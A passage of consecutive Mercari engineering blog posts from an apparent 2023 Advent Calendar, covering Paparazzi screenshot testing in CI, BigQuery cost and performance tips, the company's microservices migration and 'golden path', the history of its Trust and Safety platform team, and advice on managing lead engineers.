Instead, given a set of code changes, screenshot tests check if the way a specific piece of UI code under test renders the same way it did before the change was applied. If differences were found, it asks for manual review. Because of that, screenshot testing frameworks typically come in two parts: 1) A testing framework that renders UI code into screenshots and 2) a way to visualize the differences found between two iterations of screenshots.

A report of visual differences generated by reg-suit

Which screenshot testing framework we picked

When we first evaluated which screenshot testing frameworks we could use in April 2022, we were in the middle of finishing a full rewrite of the Mercari app codenamed “GroundUp”.
We were an early adopter of Jetpack Compose, and it seemed that the two main framework candidates for screenshot testing at the time were Shot, which had already added support for Compose, and Paparazzi, where we could see support being added on the master branch.

To evaluate these two frameworks, we have to understand that they differ fundamentally in the approach they use to generate screenshots.
Test cases for Shot run as instrumented tests – meaning they get executed on a device or emulator in an environment that is relatively close to how code would be rendered in the real world.
On the other hand, Paparazzi’s test cases run directly on the machine that executes the tests. They use a library called layoutlib which is part of Android Studio to render previews. This means that the execution time is much faster compared to Shot’s instrumented tests (~10x difference according to measurements at the time).
In simplified terms, one could say that this decision is a tradeoff between correctness and speed.

Given the size of our codebase and that we want to keep low CI/CD build times to keep our development velocity, we decided to use Paparazzi.

How to set up the CI/CD pipeline

As mentioned above, screenshot tests are effectively a way to make UI changes explicit. This is especially relevant when reviewing pull requests – so setting up a CI/CD pipeline to provide an easily accessible visual difference report is crucial.

To generate a report of visual differences, we need to compare screenshots of two different git revisions. Naïvely, one might think that it’s a comparison between the branch we want to merge into master, and master itself. However, since changes are continuously merged into master, screenshots from master may already include further UI changes. Instead we want to compare to the point in time when our branch got created off master.

In a typical Paparazzi setup, screenshots would be stored within git (using git-lfs) – however, to avoid merge conflicts when working on large scale visual changes, it is more practical to store them outside of git. Screenshot tests have already been used by our iOS team for a while, and since they use reg-suit to both store screenshots in the cloud and create a report of visual differences, we decided to adopt the same.

That being said, the CI/CD pipeline effectively becomes three steps:

Generating screenshots from test cases.
./gradlew :recordPaparazziDebug
Copying those screenshots from each module into a single directory that is compared to the version stored in the cloud.
Run reg-suit to generate the report of visual differences.
npx reg-suit run

How to write tests

Since the verification of the post-condition is not specified in the code anymore, test cases are even simpler than traditional tests.

class ChipScreenshotTest {

  @get:Rule
  val paparazzi = MercariPaparazzi()

  @Test
  fun shortLabel() = paparazzi.snapshot {
     Chip(
         label = "Foo",
         selected = false,
         onSelectionChanged = {}
     )
  }
}

Paparazzi is shipped as a JUnit test rule that exposes a function to take screenshots. We decided to create a wrapper that enables us to add some additional functionality – for example taking one screenshot for both light and dark mode.

Summary & Future

We have used screenshot tests for about nine months in our Android codebase, but have limited adoption mainly to shared components in our design system. The tests have been very helpful, both when refactoring implementations, adding new parameters to existing components as well as adding new components. We find that it has been easier to correctly implement UI specifications, review pull requests with UI changes, and based on those two our development velocity has increased.
In our experience, Paparazzi has been very stable and fast, but we’ve also faced some minor issues. Since the landscape of available frameworks has changed since we last evaluated it, we plan to look at it again to see if any changes would improve our setup.

Currently, the usage of our screenshot tests is limited to UI components in our design system module. We believe that expanding the usage of screenshot tests to cover feature screens will add additional benefit. Not only can we ship feature code with higher confidence, we can also observe how UI component changes get reflected in each feature screen.

Tomorrow’s article will be by cafxx. Look forward to it!

BigQuery Unleashed: A Guide to Performance, Data Management and Cost Optimization

Fri, 15 Dec 2023 11:00:59 GMT

This post is for Day 15 of Mercari Advent Calendar 2023, brought to you by @sathiya from the Mercari Data Operations team.

The article lists the best practices, tips, and tricks from the nooks and corners of the BigQuery Documentation. Some of these may be known to you and some will blow your mind. So, get ready to unleash the performance and bring out cost optimization in your BigQuery Data Warehouse.

Organizing Data

There are many ways of organizing data in BigQuery, which include: Sharded tables, Partitioned tables, and Clustered Tables. In sharded tables, the data resides in many tables. BigQuery has to maintain the schema and metadata for all the tables. Given the cumbersome maintenance and query performance, Google suggests using Partitioning instead.

Partitioned tables are divided into multiple segments based on the column on which the partition is made or based on the ingestion time using the pseudo _partitiontime column. When a query is made to a partitioned table with the corresponding filter based on the partitioned column, BigQuery queries only the relevant partitions.

If the nature of query filters and the columns are known prior, the performance of the partitioned tables can be throttled by defining clustered columns. The user creates this table property on partitioned tables based on those columns used in the filter and helps query relevant data faster and cheaper.

If you are wondering how to migrate from Sharded to Partitioned tables, here are the instructions on creating time-partitioned tables from sharded tables.

Data Catalogs for Data Exploration

Data Exploration and Data Catalogs go hand in hand. As the data-driven organization grows and expands, navigating and exploring the tables stored in BigQuery can be difficult. This is where data catalogs are quite helpful to make the existing data useful.

Just to give ideas, Data Catalogs;

Can associate the data assets with their respective data owners
Helps to understand the data lineage – the relationship between the datasets and tables
Documents and maintains the datasets for everyone’s usability
Defines the data products
Acts as an invaluable tool for the Finops Team

Although Data Catalogs are built by a specific team, the data catalogs are made helpful when the employees A.K.A the data citizens of an organization contribute towards the enhancement of information by adding more documentation and properties to the datasets.

At Mercari, the data operations team maintains the organization’s data catalog and constantly improves it.

Demystifying Prorated BigQuery Storage Costs

BigQuery storage costs are straightforward and the calculation is on a prorated basis. Storage is classified into active and long term storage. The flat pricing for active storage is $0.02 per GB per month. When a table/partition goes unedited (SELECTs Only, No DDL+DML) beyond 90 days, the storage mode changes from active to long term storage, which results in a 50% drop in the price from 0.02$ to 0.01$.

Consider the following calculations:

Storage Size	Period	Cost in Dollars [Active Storage]
1000MB	1 Month	$0.02
100MB	1 Month	$0.002
100MB	1/2 Month	$0.001

Beyond 90 days with no edits to the table/partition, the long term storage applies.

Storage Size	Period	Cost in Dollars [Long Term Storage]
100 MB	Stored for 1/2 Month	$0.0005

Storing 100MB of data for half a month will cost $0.001. Similarly, consider storing 1GB of data for 24 hours. This results in the following calculations:

Storage Size	Period	Cost in Dollars [Active Storage]
1000MB	^{^}730 hrs	$0.02
1000MB	24 hrs	$0.00066

^{^} 1 Month consists of 730 hours

If you are thinking about archiving your tables to Google Cloud Storage (GCS) for cost-saving purposes, you should consider the coldline/archive GCS pricing.

Here’s a comparison between BigQuery and GCS pricing.

Active storage in BQ is similar to the Standard storage in GCS
Long term storage in BQ is similar to the Nearline storage in GCS

So, it’s better to consider Coldline storage in GCS while archiving for more cost-saving. When the tables are exported to GCS, external queries can be used to fetch data from the GCS location from BQ. There are no charges for data retrieval but you pay for the slot usage. ⚠️ This behavior was observed when this article was written and this may change in the future. ⚠️

Table And Partitions Expiry Settings

The tables and partition expiry settings are often the least considered by BigQuery users but can bring in huge cost savings long term. These expiry settings can be applied at a dataset level or a table level. This can often lead to confusion which can be simplified as follows:

Table-level properties take precedence over the dataset-level expiry definitions
Partition expiry settings take precedence over the table expiry settings
Partitions that are expired are deleted immediately when the table-level partition expiry settings are applied

Unlearn `SELECT * FROM`

BigQuery stores data in columnar formats, like all other modern data warehouses. We are accustomed to running SELECT * FROM in our queries. It’s about time that we unlearn this habit and switch to SELECT col1, col2 FROM instead: fetching only the required columns while querying the tables. This leads to massive cost benefits with the lesser number of bytes to be processed.

Using Table Previews & Temporary Tables

Why do a SELECT … FROM when we could preview the table instead? For FREE! Many times, we forget about the preview option in the BigQuery Console and it comes in quite handy during the data exploration.

Fig 1 – Table Preview – Screenshot from Google BigQuery

Speaking of Freebies, did you know that when you create temporary tables, the results will be deleted in 24 hours and of course, the storage cost is free for those 24 hours? The reason behind this is that the results of every query are cached as a temporary table and the results are retained for 24 hours.

This can be very helpful while creating tables for exploratory analysis, provided you don’t intend to share the temporary tables and do not want to store the table for more than a day. ⚠️ This feature existed at the time when the article was written and may change in the future. ⚠️

Look before you Leap

Apart from the previous points, the following are some of the quirks of BigQuery that one must keep in mind to bring the best out of BigQuery.

It’s always good to have an eye on the estimated bytes to be processed for a query before it’s run. You can find this in the top right corner of the query editor on the BigQuery console. This helps save unwanted spending on query runs and slot usage.

Fig 2 – Look Before You Leap – Screenshot from Google BigQuery

While using Common Table Expressions (CTEs) A.K.A the ‘WITH’ clause, if you are about to refer to the expression multiple times, make sure that you use recursive CTEs rather than regular CTEs using the ‘WITH RECURSIVE’ keyword. You can read the full usage at this link.
Use Table Constraints wherever you can establish relationships between the BigQuery tables. This will indirectly improve query execution and performance.

Conclusion

Constant updates and features are being implemented in BigQuery. We believe that the tips and tricks that we have mentioned in the article can be useful for BigQuery users.

Tomorrow’s article will be by Lukas from the Design System Team. Stay tuned!

Current Microservices Status, Challenges, and the Golden Path

Thu, 14 Dec 2023 20:58:53 GMT

This post is for Day 14 of Mercari Advent Calendar 2023, brought to you by @ayman from Mercari Backend Architects team.

Introduction

I would like to talk in this article about an in-depth exploration of Mercari’s ambitious journey from a monolithic PHP architecture to a sophisticated microservices landscape, a transition that began in 2018. It offers a comprehensive narrative of the challenges, successes, and key learnings encountered during this transformative process. The story unfolds from the initial ease and simplicity of the monolithic setup, through the complexities and nuances of migrating to a distributed microservices system.

Background

Mercari started the project of microservice migration in 2018 coming from a PHP monolith that all teams used to collaborate on.

Working within this PHP monolith presented certain ease for engineers because:

They were not responsible for the monolith’s maintenance, which was managed by the SRE team.
There was no need to incorporate the extensive boilerplate code required for building new services.
Direct access to classes, functions, and the database was readily available.

For project managers (PMs), this setup also had its benefits. If a specific project was underway, PMs could directly assign teams to work on any part of the monolith.

However, despite these advantages, it wasn’t all unicorns and rainbows; we faced numerous challenges as well:

We can’t do parallel releases. Because we had only one release pipeline, we were organizing the releases via a release calendar, and each team needed to reserve a suitable time slot beforehand if your release failed or you needed to do extra work, this could impact the team that wanted to release after you.
Incidents had wider impacts. We had some incident that was of severity 1 or 2 because there was an error either Mercari API “our PHP monolith” timing out or our core DB “the main DB that is being used by the monolith” got so busy and stopped responding.
No governance in the code, it’s simply any team that can call any function or class that was written inside the monolith.
There were different styles when defining models, services, and other logical components

These issues limited our scalability, both in terms of team growth and workload management.

Then microservices migration decision came to the rescue as a strategic move aimed at creating a strong technical organization that can scale globally – to have a Scalable and Resilient Team.

The transition began with services that could be decoupled from the Mercari API and did not require direct database access. This involved initially developing the gateway service, authority services, and the listing-time suggestions service.

Subsequently, each team started planning migrations for their respective components within the Mercari API.

For example, the buyer domain team took on migrating buyer-related domains (such as likes, comments, page views, etc.), while the Listing domain team focused on migrating services like listing service, photo service, and so on.

To ensure a successful migration, our platform teams embarked on constructing the necessary platforms and establishing protocols for other teams to create and deploy their microservices. This included the creation and maintenance of Kubernetes (k8s) clusters, the development of pipelines for rolling out infrastructure via Terraform, and pipelines for deploying microservices to production.

Simultaneously, the architecture team implemented a set of guidelines to assist teams in adopting best practices. These covered aspects like API design, database selection decisions, error handling, pagination, and monitoring. A crucial part of these guidelines was the Production Readiness Checks (PRC), a checklist ensuring that services meet specific criteria before their production deployment.

Despite having a ready platform and comprehensive guidelines, governance remained somewhat relaxed. This approach granted teams considerable autonomy in decision-making, adhering to the principle of "you build it, you own it." While architects and platform teams could offer recommendations, the final decisions and responsibilities lay with the individual teams.

This dual setup of a robust platform and clear guidelines, coupled with a flexible governance model, initially facilitated a smooth start to the migration project for the pioneering teams. However, as the project progressed, it became apparent that this approach alone was not sufficient for the evolving demands of migration or business growth.

In the following section, we will delve deeper into the current state of our microservices, the challenges we face, and the strategies that constitute our ‘golden path’ forward.

Current Status

Microservices Status

The below graph shows the microservices/batch jobs that were released from July 2019 until December 2023 based on the production readiness checks closed every month for marketplace, merpay, and mercoin. The total number of microservices during this period was around a few hundred microservices in total.

Fig.1 – Released microservices count

To dive a little deeper, another analysis was conducted to find how many microservices teams were still actively working on in the marketplace (mercari ms/batch jobs) and the result was that only 62% of the total number of microservices in the marketplace were active after removing the deprecated microservices and also the service that has 1 deployment per month or less for 6 months (services highlighted with the red ellipse in the below diagram Fig.2).

Fig.2 – Number of deployments for each service

One important observation that we can make in Fig.1 is that this microservices count diagram shows also the trendline of the released microservices for mercari in blue, merpay in red, and mercorin in yellow, and you can see that while releasing new microservices trendline in merpay and mercoin is going up, the trendline for releasing new microservices in mercari marketplace is going down especially starting from the end of 2021 (highlighted part with the purple ellipse in the below diagram Fig.3).

Fig.3 – Released microservices count – mercari trendline highlighted

In 2021, microservice migration projects slowed down a lot due to several reasons that will be mentioned in the challenges section below. But due to these reasons, teams started to step back and think about how long it’s going to take for us to finish the migration, and that it’s taking too much time and effort.

Then teams started to be more conservative in bringing the domain logic out of Mercari API and migrating it to microservices. The new microservices that were released after this period were mainly for the new business features.

Domains

Our marketplace is structured into nine main domains, each encompassing between 2 to 9 sub-domains. The primary domains include

Growth Products
Product Engagement
Matching
Category Growth
CBO Product
Cross Border
Logistics
Platform
Foundation

In our marketplace, domains can be categorized into two logical types: Stable domains and Frequently changing domains.

The stable domains are the domains/teams that were stable enough to correctly migrate, maintain, and introduce new features and improvements to their services.

These domains/teams were there for a couple of years with minimal changes and re-org. This led them to own not only a clear feature development roadmap but also a clear engineering roadmap.

They solved their technical debts, provided better DX for their customers (other engineering teams that depend on their services), and provided better UX to Mercari’s customers as well.

Examples of those teams are Matching domain teams, and some of the foundation domain teams (ex. TnS, CS Tool, IDP).

On the other hand, the frequently changing domains are marked by constant evolution. These domains are characterized by teams that frequently undergo changes, including shuffling of team members, splitting into smaller groups, or merging with other teams. This dynamic nature often results in a few distinct challenges and characteristics:

Adaptive Roadmaps: Unlike stable domains with clear and long-term roadmaps, these domains often have to adapt their roadmaps rapidly in response to the changing team dynamics and business needs. This can lead to shifts in focus and priorities, requiring a more agile and flexible approach to project management and it’s hard for them to put a long-term engineering roadmap.

Technical and Organizational Fluctuations: Frequent changes can lead to a state of continuous fluctuations, both technically and organizationally. This might result in temporary delays as new team configurations find their footing especially when handling new microservices that they didn’t create originally and establishing effective development and on-call lifecycles.

Dependency Management Challenges: With teams often changing, managing dependencies between various sub-domains and external teams becomes more complex. This can lead to challenges in coordination and increased risks of delays or misalignments.

Variable Quality and Performance: The quality and performance of the services in these domains may vary more than in stable domains. New team compositions might take time to adjust and optimize their approaches, which can temporarily affect the quality of output and service performance.

Examples of such domains include some of the growth products teams, and some of the product engagement teams as well, where the focus is on introducing more features in the marketplace, and usually the business demand for these teams is much higher than the stable domain teams.

Mercari API

The Mercari API, our PHP monolith, has been the focus of our migration efforts since early 2018. As indicated in the second graph, it’s evident that development on the Mercari API remains highly active, with the highest number of deployments (the very first service to the left, approximately 1200) over six months.

This continued activity can be attributed to several key factors:

Exceptions to Code Freeze: Initially, management implemented a code freeze on the Mercari API to facilitate the microservices migration. However, due to the necessity of maintaining existing logic and the demand for new feature releases, and exceptions were granted. This allowed teams to continue feature development during migration. Between February 2019 and March 2021, about 150 exceptions were approved for the Mercari API.

Shift in Migration Focus: Around March 2021, there was a noticeable deceleration in the migration pace. Some teams even halted their migration efforts, choosing instead to concentrate on developing business features and growth. This shift led to renewed active development within the Mercari API.

Robust Foundation for Speed Initiative: The Engineering division launched the Robust Foundation for Speed (RFfS) initiative, aiming, in part, to enhance the modularity of the C2C transactions area within the Mercari API. The RFfS initiative enabled us to refactor various sections of the monolith, improving its usability and collaboration potential for different teams.

Reintegration Considerations: Post-RFfS, teams encountered a scenario where part of their domain logic resided in the Mercari API, while other parts were in microservices. This led to discussions about whether to move logic back to the Mercari API or to develop new features directly within it, rather than creating new microservices. This was also impacted by a policy that we need to reduce the number of microservices that we have to reduce the maintenance cost.

Reintegration Considerations: After the Robust Foundation for Speed (RFfS) initiative, teams were faced with a mixed landscape where some of their domain logic was embedded in the Mercari API, while other parts operated within separate microservices. This situation sparked discussions about the best approach moving forward: whether to consolidate logic back into the Mercari API or to continue developing new features within it instead of creating additional microservices. Compounding this decision was a new policy aimed at reducing the total number of microservices. This policy, driven by the need to lower maintenance costs, influenced teams to reconsider expanding the microservices architecture and to evaluate the benefits of a more integrated approach within the Mercari API.

The current state of the Mercari API is such that it has a dedicated team responsible for its management and on-call duties. While this team oversees the overall operation of the API, other teams are actively collaborating and integrating new features and domain logic into it. These collaborating teams are also accountable for maintaining their specific contributions to the API. In the event of an incident within a particular domain, the Mercari API team takes the initial response action and then escalates the issue to the relevant domain team for further resolution.

Challenges

The Marketplace Backend Architects team organized workshops with all backend teams to identify the daily challenges they encountered. These challenges were primarily categorized into four groups: platform challenges, architecture challenges, common challenges, and organizational challenges.

The following chart shows a percentage of how many challenges for each category relative to all the issues that we collected.

Fig.4 – Number of issues per each category

In the upcoming sections, we will delve into some of these challenges in more detail.

Platform Challenges

Fig.5 – Number of teams who reported each challenge in the platform category

The above chart shows how many teams reported certain challenges for example.

Discoverability of the current platform and microservices documentation reported by 7 teams (blue area).
Lack of documentation for platform tools reported by 5 teams (red area).
Reduce manual work that every team needs to do to keep maintaining their services (CI/CD migration, k8s-kit, ISTIO, Dependabot, etc.) reported by 5 teams. (yellow area)

Architecture Challenges

Fig.6 – Number of teams who reported each challenge in the architecture category

The above chart shows how many teams reported certain challenges for example.

More standardization in different areas including endpoint management, E2E testing, PII deletion, etc. This issue was reported by 14 teams, but every team reported it from their perspective. (orange area)

New Businesses Challenges

While recent workshops primarily focused on platform and architecture challenges, it’s essential to acknowledge the significance of new business challenges in Mercari’s growth. As we explore innovative ideas and ventures, our approach typically involves two key strategies:

Proof of Concept (PoC) for Business Validation: We initiate a POC to test new ideas, ensuring that we don’t overcommit resources before confirming the viability of the business concept.
Rapid Time to Market: Our goal is to launch new ventures as swiftly as possible, minimizing delays in bringing them to our customers.

In pursuing these new opportunities, teams often prefer two approaches:

Independent Development from Marketplace Services: To avoid delays associated with integration and coordination with existing marketplace teams, new business teams may develop services separately. This includes creating their versions of existing services, like a new authority service for the new business, to expedite development.
Flexibility in Architecture Guidelines: Sometimes, in the interest of speed and innovation, teams might deviate from the established architectural guidelines.

While these approaches can pose integration challenges when reintegrating with the marketplace later, they also offer invaluable benefits. Exploring new technologies and landscapes not only fosters innovation but also enriches the team’s experience and skill set.

For instance, some of our new business ventures have introduced progressive concepts such as monorepos and modular monolithic architectures, or the utilization of previously unexplored services in GCP. These experiences contribute significantly to our technological and strategic arsenal.

Learning Opportunities

In reflecting on Mercari’s transition to microservices, and also on the previous challenges, we can identify some key learning opportunities:

Challenges of Maintaining Backward Compatibility: One of our initial strategies was to ensure backward compatibility for migrated endpoints. This approach was intended to streamline the migration process and minimize client-side disruptions by allowing a simple switch from old to new endpoints. While this expedited migration and reduced immediate client-side impact, it inadvertently led to the transfer of some technical debt and legacy issues into the new microservices environment. This sometimes amplified the challenges, as these issues became more complex within a distributed system.

Stability of Domain Teams: As previously discussed, the stability of certain domain teams posed a challenge. Some teams, due to their fluctuating compositions and focus, found it difficult to establish and follow through with robust, long-term migration plans for their respective domains.

Adapting Business Processes to Microservices: The transition to a microservices architecture did not significantly alter our approach to business growth and feature development. Previously, it was feasible for a single team to implement features spanning multiple areas of the monolith. However, in a microservices environment, such an approach necessitated increased inter-team collaboration and coordination due to the interconnected nature of services. This shift highlighted the need for adapting our feature development strategies to better suit the nature of a microservices-based ecosystem.

Enhanced Investment in Platform Infrastructure: Investing more significantly in our platform infrastructure, particularly in Platform as a Service (PaaS), can help reduce manual work. This investment is essential for supporting scalability and efficiency.

Governance and Standardization at Scale: As operations scale, the initially relaxed governance model may become less effective. Therefore, implementing more stringent governance and standardization is crucial to manage growth effectively and maintain system integrity.

Framework for New Business Initiatives: Establishing a comprehensive framework for new business ventures is critical. This framework should balance the need for speed in launching new projects with the requirement for smooth integration into the marketplace or seamless termination if necessary. It aims to minimize friction and ensure alignment with broader business objectives.

Golden Path

Given the above learning opportunities, it’s time to have our Golden Path right now in Mercari. The term Golden Path entails an opinionated, well-defined set of recommended practices, tools, and architectural patterns that are advocated within an organization to achieve optimal results. These practices need to have a more strict governance model via the platform tools.

From the point of view of the architects’ team, the key to a successful golden bath is to have a single properly-sized DX team that owns, has full authority, and is responsible for the whole interface surface between the platform teams (MSP, data platform, experimentation, IDP, search platform, etc.) and the domain/feature teams – so that these teams can focus almost exclusively on business logic.

To mention some examples of what the golden path needs to provide for backend teams:

Teams can deploy a simple service in production from scratch in at most half a day. Teams can either deploy it using an application model or with a serverless model. Unless overridden via manifest, the service is automatically deployed in all appropriate regions.

Teams can safely expose a standard endpoint to web/app or other external clients, as well as to other internal services, with at most one line of configuration in the manifest.

As long as I follow the golden path, I need to maintain a minimal set of scaffolding code, I only have to add a single, config-less middleware to inbound/outbound traffic, and all configuration for my service is kept together, in a single manifest, with the sources of my service. This golden path automatically provides: managed user-service and service-service authn/z, managed observability, and managed reliability.

Conclusion

As we reflect on Mercari’s journey from a PHP monolith to a dynamic microservices architecture, it’s clear that this path has been marked by both triumphs and challenges. The migration, initiated in 2018, was more than just a technical improvement; it represented a pivotal shift in our approach to software development, team collaboration, and business strategy. Throughout this journey, we’ve encountered a range of experiences – from the ease of collaboration within the PHP monolith to the complexities of managing a distributed, microservices environment.

Our transition to microservices was not just a matter of technological change but also a learning curve in organizational adaptability and strategic foresight. The challenges we faced, such as maintaining backward compatibility and adapting business processes to fit a new architectural paradigm, were not merely obstacles but opportunities for growth and innovation. They compelled us to think critically about how we build, maintain, and evolve our software and how our teams collaborate and drive the company forward.

Looking ahead, we’re poised at a crucial juncture. The insights gained from our experiences have been invaluable in shaping our Golden Path – a set of practices, tools, and architectural patterns tailored to optimize our outcomes.

In collaboration with various stakeholders, we started to define and plan this path, ensuring that it aligns with our evolving business needs and technological advancements.

We envision a unified platform where engineers can easily access documentation, submit design documents for reviews, manage Architectural Decision Records (ADRs), and create new services and applications. This platform will alleviate the burden of scaffolding work, allowing our teams to focus on innovation and efficiency.

Our ambition is to forge a path that not only embodies best practices for high software quality and efficiency but also accelerates the time-to-market for new business initiatives. This Golden Path is more than a guideline; it’s a commitment to continual improvement and a testament to our journey from a PHP monolith to a dynamic and flexible architecture.

TnS Platform Team, past, present, and future

Thu, 14 Dec 2023 10:00:24 GMT

Introduction

This post is for Day 14 of Merpay Advent Calendar 2023.

Hi, I’m @ntk1000, Engineering Manager of the Mercari/Merpay TnS Platform Team.
You may be wondering, “Mercari/Merpay?” Yes, our team belongs to both Mercari and Merpay.
And what is TnS? TnS stands for Trust and Safety. Our mission is to provide our users with a safe and secure service experience.
In this article, I would like to explain why our team belongs to both Mercari and Merpay, what we are doing as TnS, and what we have been and will be doing.

Starting as an AML/CFT Engineering Team

When I became the EM in charge of this team almost four years ago, the team name was the Merpay AML/CFT Team.
AML/CFT stands for Anti-Money Laundering/Combating the Financing of Terrorism. Merpay is mandated to conduct anti-money laundering and counter-terrorism financing as a financial service. The main role of the team at that time was to realize AML/CFT functionality through engineering and to develop and operate it.
Specifically, as written in a blog post after the release of Merpay here, we worked on the Rules Engine and defining and developing various rules on top of it.

Renaming from AML/CFT to TnS Platform

Shortly after I became an EM on the AML/CFT Team, the COVID-19 pandemic hit, and the team switched to a remote working structure. As restrictions on offline activities, such as stay-at-home measures, expanded and continued, there was a more active shift toward online services, leading to the growth of Merpay. To limit the increase in fraud losses, the types of anti-fraud measures also became more extensive. For example, the Rules Engine, mentioned above, now includes not only AML/CFT but also an increasing number of rules to control chargebacks associated with credit card fraud. While the Rules Engine serves as an after-the-fact detection that monitors transactions over a certain period of time, we also built the new real-time detection system.
Thus, we renamed our team from AML/CFT to TnS (Trust and Safety) in conjunction with the Product organization in order to provide a broad anti-fraud solution in line with Merpay’s expansion: a safe and secure transaction experience for our users. At the same time, our team is responsible not only for the development of anti-fraud rules themselves, but also for the improvement and operation of the rule execution platform as the service expands, so we renamed our team “TnS Platform” as the team responsible for the anti-fraud platform.

TnS Platform Team Building!

Team Mission Statement

Along with the renaming of the team, we also established a mission statement and responsibilities.

Mission:

Empower Mercari Group by providing an anti-fraud measure platform and achieve Mercari Group’s mission with safe and secure transactions

Responsibilities:

Expand and reinforce fraud prevention/detection features for product growth
Design and align to the industry standards and regulations
Keep improving security, scalability, and reliability

Looking back, I can say that we have certainly fulfilled these responsibilities. The fraud countermeasures we implemented were not limited to Merpay, but also included the services of Group companies such as Mercari and Mercoin. At the same time, to improve the security, scalability, and reliability of the system, we moved forward with several cloud migrations.

From Merpay Product/Engineering to a Company-wide, Group-wide Organization

Along with the expansion of the team’s responsibility, one of the changes has been the strengthening of collaboration with the various TnS-related teams. In order to cope with increasingly complex and fast-paced fraud, the teams involved in fraud countermeasures now share a common sense of the challenges and cooperate with each other under the same goal/OKR. Originally, our team was already in contact with the TnS Product Team and often worked together on development rules and examining fraud countermeasures, and the ML team, which works together as a system to prevent fraud and respond to new fraud trends. This structure made it easy for us to contact other teams like operator teams, data analysts, and risk management teams.
For example, the operator team, which monitors transactions, shares the status of fraud damage in near real-time. This allows Product/Engineering to respond to sudden changes in fraud trends.

The organization has grown into a Group-wide fraud countermeasure organization not bound by the company structure, together with the Mercari TnS Team, which had been working on fraud countermeasures for Marketplace. Although Mercari is organizationally divided into several companies and teams, the Mercari app is a single app. So this structure is currently in place to prevent any omission of fraud countermeasures due to the division of companies according to organizational structure.
As a result, Group-wide TnS is quite a huge organization. However, the TnS Program Team has organized a common framework for our roadmap, common goals, and many other areas, which has enabled us to align the perspective and steps of each team. To give one specific example, the cycle of sharing each team’s backlog, discussing common OKRs by managers, sharing the strategy internally (Quarter Review and Next Quarter Sharing), and passing it on to each team’s OKRs has been working well. I feel that this cycle has resulted in smooth decision-making.
We have TnS-related engineering teams assigned in Mercari, Merpay, and India, and we are strengthening mutual knowledge sharing and system collaboration. We’ve started knowledge sharing from introductions of each team, and now we have study sessions to expand our domain knowledge. As for system collaboration, for example, we are considering the use of our Rules Engine and real-time fraud detection system developed by our team for fraud countermeasures in the marketplace, and engineers from Mercari are also involved in the development of the Rules Engine.

In short, we are collaborating well without being siloed!

Knowledge Sharing Session at the India Bengaluru Office

Summary for the Future

This article is a brief history of our TnS Platform Team, explaining the changes in the scope of our roles and our collaboration with related teams. The process of working together across organizations and companies with the same goals required a lot of discussion among the managers, but I believe that we were able to move forward with the changes without friction.

As Mercari Group continues to expand its services, we expect fraud prevention to become more complex and sophisticated. Despite the uncertainties because of Mercari’s unique combination of services and the lack of precedents for fraud prevention, I believe this is a challenging and rewarding area.

As an Engineering Manager of the TnS Platform Team, I aim to provide safe, secure, and reliable services to our users and develop an engineering team that can lead fraud countermeasure platform in various areas developed by Mercari Group.

Thanks for reading!

We’re TnS Engineering Managers!

Ref.

If you are interested in our TnS Platform, please check out the following articles by our team members! (I have already referenced several of them in this article.)

Tomorrow’s article will be by @tokuda109. Look forward to it!

Leading a team of lead engineers

Wed, 13 Dec 2023 11:00:44 GMT

This post is for Day 13 of Mercari Advent Calendar 2023, brought to you by @fp from the Mercari Mobile Architects team.

As an Engineering Manager, your main responsibility is to make sure your team is working at its full potential, while team members have the opportunity to grow in their careers.
It requires a variety of skills and involves making sure all team members are motivated, happy, feels valued, trust their manager and their peers, believe in what they do and what the company does, and many other requirements.
This responsibility becomes even more challenging when your team is mostly composed of lead engineers. They have a lot of experience and knowledge, they know what they want, they are not afraid to speak up when they see something misleading, and they can easily find another job if needed.

In this article I’ll describe what I’ve learned in my years managing the Mobile Architects team in Mercari, how to try to get a team’s trust, motivate them and navigate good and bad times together.

Definition

In the article I will often refer to Lead Engineer.
Lead Engineer has different definitions, in my case I use it to describe the group of people with different job titles such as Lead, Staff, Principal as well as Senior engineer. But it’s not about the job title, the Lead Engineer I will refer to is a role, where engineers excel not only in technical skills and abilities, but also in communication, teamworking, vision, prioritization and empathy. They excel in all the Mercari values: Be a Pro, All for One, Go Bold.
They are the people you will always want in your team, someone you can always rely upon and will never let you down.

Background

I’ve started working in Mercari a couple of years ago, as Engineering Manager for the Mobile Architect teams.
Shortly after I joined, the team delivered one of the most bold projects in Mercari: GroundUP.
After delivering GroundUP, the team took over more responsibilities and new members joined. Currently the team owns and maintains the foundations of Mercari mobile apps as well as the mobile infrastructure.
The team is composed of iOS and Android engineers, and divided in 3 Pods that foster collaboration and provide independence.

Gaining trust

The foundation of every kind of relationship is trust.
In a managerial role, trust is more important than ever, people will not follow your lead if they don’t trust you.
The most effective way to gain trust is, I believe, to be open, transparent and human.
This is not only true for Lead Engineers, but for people in general.
Being open and transparent while in a position of leadership is complex, especially at the beginning.
Like in every relationship, it is important to not rush it and let it grow.

Personally I always try to be open in the following ways:

Admit your limits: I make it clear that I don’t know everything and that I sometimes make mistakes. This helps to establish a more peer-like relationship.
Listen: Simply listening to their issues, challenges, and blockers is incredibly important. It’s also crucial not to dismiss their concerns and to follow up. Asking “How is it going with that issue you told me about last week?” can be incredibly powerful. It shows that you care and makes people feel valued.
Share your failures: I try to share my mistakes. Lead engineers know from experience that making mistakes is part of the journey to where they are. By acknowledging our mistakes, we can connect with others on a more human level.

It’s not enough being open if you are not being transparent, people will notice it, understand you have a personal agenda. It’s very hard to trust people who hide something.
When managing Lead Engineers, this is especially important. They have experience, they know if you are not transparent with them.
I personally try to be as transparent as possible in my team, we all work together, everybody needs to know as much as possible and be in the loop.
When transparency is lacking, people start filling the gaps by themselves and this leads to making assumptions.

Finally, it’s very important to be human. Treating everyone with respect, understanding how they are feeling, understanding there are good days and bad days, and especially, understanding that this is just a job and people have their personal life, families, and that will always take precedence.

Keeping them motivated

You have their trust, now how do you keep the team motivated and performant?
These people are the best in their field, you cannot simply ask them to work on bug fixes, small tweaks etc.
They became Lead Engineers by pushing boundaries, working on challenging problems with all sorts of tech stacks.
Their Github is full of OSS contributions and every company would jump at the opportunity to hire one of them.

So, what about asking them what they want to work on?
It’s a simple but effective strategy.
Let’s be honest, it is counterproductive to hire and pay Lead Engineers and then tell them what to do.
They know what should be done to improve the product, they worked for years in their field, in the best companies, they have already been in this situation.
Ask them, listen to them and enable them to achieve it.

In some cases, this will need to align with the company roadmap, and sometimes it might not be possible to have them work on what they want.
Being able to align the company roadmap with engineering investigations, improvements, and new technologies is challenging but it’s one of the tasks you will get paid for.
It’s important to balance Lead Engineers priorities with company priorities, and being open and transparent it’s the best way to achieve this.
